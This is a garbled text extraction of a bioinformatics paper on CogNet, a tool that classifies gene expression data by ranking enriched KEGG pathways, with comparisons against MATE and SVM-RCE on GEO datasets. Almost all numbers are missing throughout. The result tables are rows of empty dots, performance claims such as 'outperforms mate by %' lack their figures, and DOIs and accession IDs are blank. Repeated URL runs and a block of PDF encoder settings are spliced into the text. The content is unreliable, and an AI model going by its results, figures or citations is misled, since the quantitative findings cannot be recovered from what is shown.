f-measure. table example of output of top pathways and top genes. kegg pathway count genes hsa brip, rmi ,ube t hsa creb l ,gnb ,hist h ak,hist h bc,hist h bj,hist h h, hist h aa ,ppp r b hsa col a ,hist h ak,hist h bc,hist h bj,hist h h,hist h aa hsa col a ,prlr figure multi-file cognet workflow that applied on multiple datasets. full-size doi: . /peerj-cs. /fig- yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ used to calculate the statistics (with tp: true positive, fp: false positive, tn: true negative and fn referring to false negative classifications): sensitivity (se, recall) = tp/(tp + fn) specificity (sp) = tn/(tn + fp) accuracy (acc) = (tp + tn)/(tp + tn + fp + fn); acc additionally, the area under the receiver operating characteristic (roc) curve measure (auc) (bradley, ) is an estimate of the probability that a classifier will rank a randomly chosen positive instance higher than a randomly chosen negative instance. all reported performance measures refer to the average of -fold mccv. some of the data sets used by the classifier are imbalanced, which can influence the classifier to the advantage of the set with more samples. this is known as the problem of the imbalanced class distribution. we have applied an under-sampling approach that reduces the number of samples of the majority class to the minority class, thus reducing the bias in the size distribution of the data subsets. we choose to apply the under-sampling of ratio : . availability and implementation the knime workflow, implementing cognet, is available at https://malikyousef.com -> bioinformatics tools and github at https://github.com/malikyousef/mircorrnet. the doi of the tool is https://doi.org/ . /zenodo. . results we have considered gene expression data sets to test cognet and for comparison with other similar tools. to our knowledge, no tools similar to cognet exists. nonetheless, we compare cognet with tools that have similar merit of grouping and rankings, mate and svm-rce. although the purpose of the comparison is not to prove a higher performance, it outperforms mate and gets similar performance to svm-rce with figure the main workflow (as meta-nodes) for cognet. full-size doi: . /peerj-cs. /fig- yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://malikyousef.com https://github.com/malikyousef/mircorrnet https://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ advantage of using a very smaller number of genes than svm-rce. additionally, we have run cognet with two versions, where the cognet_svm uses the svm for the scoring and classification while the cognet_rf uses random forest (rf) for scoring and classification. the results for cognet-svm is provided in the supplemental data. table description of the data sets used in our study. the data sets are obtained from geo. each entry has the geo code the name of the data, the number of samples and the classes of the data. geo accession title sample count classes gds glioma-derived stem cell factor effect on angiogenesis in the brain pos = neg = non-tumor = (neg) astrocytomas = (pos) glioblastomas = (pos) gds early-stage parkinson’s disease: whole blood pos = neg = healthy control = (neg) neurodegenerative disease control = (neg) parkinson disease = (pos) gds colon epithelial biopsies of ulcerative colitis patients pos = neg = normal = ulcerative colitis = gds metastatic prostate cancer (hg-u c) pos = neg = normal = tumor = gds pulmonary hypertensions: pbmcs pos = neg = control = (neg) idiopathic pulmonary arterial hypertension = (pos) scleroderma-associated pulm. arterial hypert. = (pos) systemic sclerosis (ssc) without pulm. hypert. = (pos) ssc, interstitial lung disease & pulm. hypert. = (pos) gds celiac disease: primary leukocytes pos = neg = healthy control = celiac disease = gds diabetic children: peripheral blood mononuclear cells (u a) neg = pos = healthy = type , diabetes = gds non-small cell lung carcinoma in female nonsmokers pos = neg = lung cancer = control = gds severe asthma: bronchial epithelial cell pos = neg = mild asthma = control = severe asthma = gds _ colorectal cancer: laser microdissected tumor tissues colorectal cancer: homogenized tumor tissues pos = neg = laser microdissected tumor tissues = homogenized tumor tissues = gse (gds ) colonic mucosa pos = neg = colonic mucosa of healthy control = colonic mucosa patients = gse (gds ) rheumatoid arthritis (ra) patients pos = neg = rheumatoid arthritis (ra) control gse (gds ) prostate cancer analysis of malignant and benign prostate tissues pos = neg = prostate cancer = normal = yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table (a–c) a summary result table presenting the auc of each tool over data sets. #clusters/#groups are related to the number of clusters for svm-rce and groups for mate and cognet. auc is average of for the performance of area under curve while #g is the average number of genes for each level. #clusters/ #groups svm-rce gds gds gds gds gds gds gds gds _ gds gds gds gds gds auc auc auc auc auc auc auc auc auc auc auc auc auc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . avg . . . . . . . . . . . . . #clusters/ #groups #g #g #g #g #g #g #g #g #g #g #g #g #g #clusters/ #groups cognet_rf gds gds gds gds gds gds gds gds _ gds gds gds gds gds auc auc auc auc auc auc auc auc auc auc auc auc auc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . avg . . . . . . . . . . . . . #clusters/ #groups #g #g #g #g #g #g #g #g #g #g #g #g #g (continued) yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for each tool other than svm-rce, we have obtained the performance over the top – groups that were ranked by the scoring stage. for svm-rce we obtained the performance starting by , genes and clusters, then reduced % at each iteration. for comparing purposes, we consider the last clusters. table presents in detail all the results obtained applying the cognet_rf tool. the auc measure is presented. the columns #g present the average of the number of genes over the iterations was applied as a cross-validation. figure presents the average of all auc results over the datasets on the clusters/ groups, for each tool (avg auc bar), while the avg#genes bar represent the average of the number of genes over the datasets on the clusters/groups. the results presented in tables a– c and fig. , indicate that on average cognet outperforms mate by % while getting similar results with svm-rce. considering the number of genes, svm-rce is folds greater than cognet. additional observation that both tools svm-rce and mate failed to reach reasonable results on the data gds , while cognet reached performance of about – %. figure the average of the results for the three tools. the upper part is the performance auc measurement while the lower part is the number of genes (#g). full-size doi: . /peerj-cs. /fig- table (continued) #clusters/ #groups cognet_rf gds gds gds gds gds gds gds gds _ gds gds gds gds gds auc auc auc auc auc auc auc auc auc auc auc auc auc yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table association of the top pathways with the disease under study. “dataset” indicates the dataset geo id. dataset investigated disease id pathway literature support pmid gse rheumatoid arthritis hsa non-alcoholic fatty liver disease (nafld) none none gse rheumatoid arthritis hsa ubiquitin mediated proteolysis aberration of this system leads to the dysregulation of cellular homeostasis and the development of multiple inflammatory and autoimmune diseases, including rheumatoid arthritis. gse rheumatoid arthritis hsa huntington disease none none gse rheumatoid arthritis hsa thermogenesis none none gse rheumatoid arthritis hsa retrograde endocannabinoid signaling endocannabinoids, a group of endogenous bioactive lipids, have immunomodulatory effects able to influence both inflammation and pain in rheumatic disease, including rheumatoid arthritis. , gse rheumatoid arthritis hsa alzheimer disease none none gse rheumatoid arthritis hsa autophagy deregulation of autophagic pathway has recently been implicated in the pathogenesis of several autoimmune diseases, including rheumatoid arthritis. gse rheumatoid arthritis hsa nod-like receptor signaling pathway nod-like receptors are being implicated in the pathology of ra and other rheumatic diseases. gse rheumatoid arthritis hsa parkinson disease none none gse rheumatoid arthritis hsa viral carcinogenesis none none gse colorectal cancer hsa estrogen signaling pathway none none gse colorectal cancer hsa b cell receptor signaling pathway none none gse colorectal cancer hsa erbb signaling pathway erbb pathway may have a role in both normal colon epithelial cell differentiation and malignant transformation. gse colorectal cancer hsa leishmaniasis none none gse colorectal cancer hsa breast cancer none none gse colorectal cancer hsa focal adhesion cancer cells exhibit highly altered focal adhesion dynamics. gse colorectal cancer hsa apoptosis abnormalities in apoptotic function contribute to both the pathogenesis of colorectal cancer and its resistance to chemotherapeutic drugs and radiotherapy. gse colorectal cancer hsa mapk signaling pathway mapk signaling plays an important part in progression of colorectal cancer. gse colorectal cancer hsa human t-cell leukemia virus infection none none gse colorectal cancer hsa pathways in cancer "meta"-pathway of cancer pathways. none gse prostate cancer hsa cell cycle dysregulation of the cell cycle is implicated in the biology of many cancers, including pca. , , (continued) yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ validation of the results we have conducted further analysis using the datasets (gse , gse and gse ) that was considered in the pathfindr study. gse consists of samples corresponding to rheumatoid arthritis (ra) patients and controls. the aim of this study is to identify peripheral blood gene expression profiles for ra patients. the study considers the standard statistical approaches in order to detect the significant genes by anova with false discovery rate (fdr < %). the gene ontology (go) in the panther database is applied to identify biological processes. gse consists of colonic mucosa of healthy control samples and patient samples. patients and controls were age- ( or less), ethnicity- (chinese) and tissue- matched. the analysis to detect significant genes was based on t-test, hierarchical clustering, mean fold-change and principal component. gse consists of prostate cancer samples and normal. the aim of the study is to compare the expression levels between malignant and benign prostate tissues. we have run the cognet tool on those three datasets obtaining the performance on top significant pathways. the auc values are presented in table . association of the top pathways with the disease under study for each dataset, the top groups (pathways) identified by cognet were manually examined in the literature for a possible association with the disease table (continued) dataset investigated disease id pathway literature support pmid gse prostate cancer hsa axon guidance none none gse prostate cancer hsa hippo signaling pathway the hippo pathway effector yap regulates motility, invasion, and castration-resistant growth of prostate cancer cells. gse prostate cancer hsa human t-cell leukemia virus infection none none gse prostate cancer hsa ras signaling pathway ras signaling plays an important role in prostate cancer progression and is a possibly mediator of hormone resistance. , gse prostate cancer hsa biosynthesis of unsaturated fatty acids alterations in lipid metabolism, and specifically the uptake and synthesis of fatty acids (fas), comprise a well-documented aspect of metabolic reprograming in cancer. gse prostate cancer hsa human cytomegalovirus infection none none gse prostate cancer hsa tgf-beta signaling pathway tgf-beta signaling has pivotal roles in tumorigenesis and tumor progression , gse prostate cancer hsa mapk signaling pathway mapk signaling pathways act through their effects on apoptosis, survival, metastatic potential, and androgen-independent growth in prostate cancer gse prostate cancer hsa age-rage signaling pathway in diabetic complications none none note: “investigated disease” indicates the disease investigated by the study. “id” and “pathway” indicate the kegg id and pathway name of the top pathway, respectively. “literature support” provides a brief summary of literature support for the pathway-disease association. “pmid” indicates the pubmed id(s) of the supporting study/ studies. yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ under study. literature support for the top pathways per each dataset are presented in table . for gse , the rheumatoid arthritis dataset, out the top pathways were found to be supported by literature to be associated with rheumatoid arthritis biology. for gse , comparing colorectal cancer patients to healthy controls, out of the top pathways were supported by literature to be associated with colorectal cancer. finally, for gse , the dataset comparing human prostate benign and malignant tissue, out of the top pathways were found to be associated with prostate cancer. the cognet results highlighted several new pathways that could contribute to the identification of innovative clinical biomarkers for diagnostic procedures and therapeutic intervention. discussion and conclusions we have presented a novel tool called cognet that is based on ranking and classification and integration of biological knowledge. cognet is developed on top of the tool pathfindr to add to its functionality the ability to perform classification using the enriched kegg pathways as features. cognet outputs to the user the performance and a list of significant kegg pathways that we believe will contribute to a better and deep understanding of the data under investigation. there is similarity between cognet and mate in that both rank a group of genes for classification tasks. however, cognet is using the biological information of the kegg pathways that was processed by an enrichment procedure to suggest a list of significant pathways, then cognet ranks those pathways in terms of their contribution for separating the two-class of the given data (classification task). however, mate uses prior information about microrna and its target genes to group the genes. this grouping is not related to the expression of the genes as cognet is considering. moreover, svm-rce is using the clustering algorithm k-means in order to group the genes into clusters, that means that groups are related to the expression of the genes. as a future work, we would develop cognet to explore the effectiveness of different combinations of the kegg pathways in the data, that means instead of ranking each pathway’s genes individually, we will use a different approach to rank those groups simultaneously. in the current version, cognet ranks each kegg pathway individually by performing internal cross validation. additionally, we are working to integrate cognet and mate where the process of the rank will be applied on the groups generated by the biological functions used in each tool. as a result, the discovery of the significant pathways and microrna targets genes will suggest to the biology researcher to explore the role of pathways and microrna together in the same data. the success of cognet, mate and svm-rce is suggesting that more computational approaches need to be developed based on the merit of integration of biological information into the machine learning algorithm. yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � malik yousef conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � ege Ülgen conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � osman uğur sezerman conceived and designed the experiments, performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data is available at ncbi geo: gds , gds , gds , gds , gds , gds , gds , gds , gds , gds , gds , gds , gse , gds , gse , gds , gse , gds . the code is available at github: https://github.com/malikyousef/mircorrnet. the doi of the tool is available at zenodo: malikyousef. ( , november ). malikyousef/mircorrnet: mircorrnet (version v . ). zenodo. doi . /zenodo. . references acharya s, saha s, nikhil n. . unsupervised gene selection using biological knowledge: application in sample clustering. bmc bioinformatics ( ): doi . /s - - - . ashburner m, ball ca, blake ja, botstein d, butler h, cherry jm, davis ap, dolinski k, dwight ss, eppig jt, harris ma, hill dp, issel-tarver l, kasarskis a, lewis s, matese jc, richardson je, ringwald m, rubin gm, sherlock g. . gene ontology: tool for the unification of biology. nature genetics ( ): – doi . / . bellazzi r, zupan b. . towards knowledge-based gene expression data mining. journal of biomedical informatics ( ): – doi . /j.jbi. . . . berthold mr, cebron n, dill f, gabriel tr, kötter t, meinl t, ohl p, thiel k, wiswedel b. . knime: the konstanz information miner: version . and beyond. acm sigkdd explorations newsletter ( ): – doi . / . . yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/nuccore/gds https://dx.doi.org/ . /zenodo. https://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /j.jbi. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bradley ap. . the use of the area under the roc curve in the evaluation of machine learning algorithms. pattern recognition ( ): – doi . /s - ( ) - . clough e, barrett t. . the gene expression omnibus database. methods in molecular biology ( ): – doi . / - - - - _ . cohn-alperovich d, rabner a, kifer i, mandel-gutfreund y, yakhini z. . mutual enrichment in aggregated ranked lists with applications to gene expression regulation. bioinformatics ( ):i –i doi . /bioinformatics/btw . deshpande g, li z, santhanam p, coles cd, lynch me, hamann s, hu x. . recursive cluster elimination based support vector machine for disease state prediction using resting state functional and effective brain connectivity. plos one ( ):e doi . /journal.pone. . fang oh, mustapha n, sulaiman mn. . an integrative gene selection with association analysis for microarray data classification. intelligent data analysis ( ): – doi . /ida- . harris d, niekerk av. . feature clustering and ranking for selecting stable features from high dimensional remotely sensed data. international journal of remote sensing ( ): – doi . / . . . inza i, larrañaga p, blanco r, cerrolaza aj. . filter versus wrapper gene selection approaches in dna microarray domains. artificial intelligence in medicine ( ): – doi . /j.artmed. . . . johannes m, brase jc, fröhlich h, gade s, gehrmann m, fälth m, sültmann h, beissbarth t. . integration of pathway knowledge into a reweighted recursive feature elimination approach for risk stratification of cancer patients. bioinformatics ( ): – doi . /bioinformatics/btq . lazar c, taminau j, meganck s, steenhoff d, coletta a, molter c, de schaetzen v, duque r, bersini h, nowé a. . a survey on filter techniques for feature selection in gene expression microarray analysis. ieee/acm transactions on computational biology and bioinformatics ( ): – doi . /tcbb. . . lazzarini n, bacardit j. . rgife: a ranked guided iterative feature elimination heuristic for the identification of biomarkers. bmc bioinformatics ( ): doi . /s - - - . nacu s, critchley-thorne r, lee p, holmes s. . gene expression network analysis and applications to immunology. bioinformatics ( ): – doi . /bioinformatics/btm . pan w. . a comparative review of statistical methods for discovering differentially expressed genes in replicated microarray experiments. bioinformatics ( ): – doi . /bioinformatics/ . . . papachristoudis g, diplaris s, mitkas pa. . sofocles: feature filtering for microarray classification based on gene ontology. journal of biomedical informatics ( ): – doi . /j.jbi. . . . perscheid c, grasnick b, uflacker m. . integrative gene selection on gene expression data: providing biological context to traditional approaches. journal of integrative bioinformatics ( ): doi . /jib- - . piñero j, ramírez-anguita jm, saüch-pitarch j, ronzano f, centeno e, sanz f, furlong li. . the disgenet knowledge platform for disease genomics: update. nucleic acids research :gkz doi . /nar/gkz . yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /bioinformatics/btw http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /ida- http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.artmed. . . http://dx.doi.org/ . /bioinformatics/btq http://dx.doi.org/ . /tcbb. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /bioinformatics/btm http://dx.doi.org/ . /bioinformatics/ . . http://dx.doi.org/ . /j.jbi. . . http://dx.doi.org/ . /jib- - http://dx.doi.org/ . /nar/gkz http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ qi j, tang j. . integrating gene ontology into discriminative powers of genes for feature selection in microarray data. in: proceedings of the acm symposium on applied computing—sac ’ , seoul, korea, . quanz b, park m, huan j. . biological pathways as features for microarray data classification. in: proceeding of the nd international workshop on data and text mining in bioinformatics— dtmbio ’ . napa valley, california, usa, . raghu vk, ge x, chrysanthis pk, benos pv. . integrated theory-and data-driven feature selection in gene expression data analysis. in: ieee rd international conference on data engineering (icde). san diego, ca, usa, – . ulgen e, ozisik o, sezerman ou. . pathfindr: an r package for comprehensive identification of enriched pathways in omics data through active subnetworks. frontiers in genetics : doi . /fgene. . . van ’t veer lj, dai h, van de vijver mj, he yd, hart aam, mao m, peterse hl, van der kooy k, marton mj, witteveen at, schreiber gj, kerkhoven rm, roberts c, linsley ps, bernards r, friend sh. . gene expression profiling predicts clinical outcome of breast cancer. nature ( ): – doi . / a. vanjimalar s, ramyachitra d, manikandan p. . a review on feature selection techniques for gene expression data. in: ieee international conference on computational intelligence and computing research (iccic). – . yousef m, abdallah l, allmer j. . mate: discovering expressed interactions between micrornas and their targets. bioinformatics ( ): – doi . /bioinformatics/btz . yousef m, jung s, showe l, showe m. . recursive cluster elimination (rce) for classification and feature selection from gene expression data. bmc bioinformatics ( ): doi . / - - - . yousef m, ketany m, manevitz l, showe lc, showe mk. . classification and biomarker identification using gene network modules and support vector machines. bmc bioinformatics ( ): doi . / - - - . zhao x, wang l, chen g. . joint covariate detection on expression profiles for identifying micrornas related to venous metastasis in hepatocellular carcinoma. scientific reports ( ): doi . /s - - - . zycinski g, barla a, squillario m, sanavia t, camillo bdi, verri a. . knowledge driven variable selection (kdvs)—a new approach to enrichment analysis of gene signatures obtained from high–throughput data. source code for biology and medicine ( ): doi . / - - - . yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /fgene. . http://dx.doi.org/ . / a http://dx.doi.org/ . /bioinformatics/btz http://dx.doi.org/ . / - - - http://dx.doi.org/ . / - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cognet: classification of gene expression data based on ranked active-subnetwork-oriented kegg pathway enrichment analysis introduction materials and methods results discussion and conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f 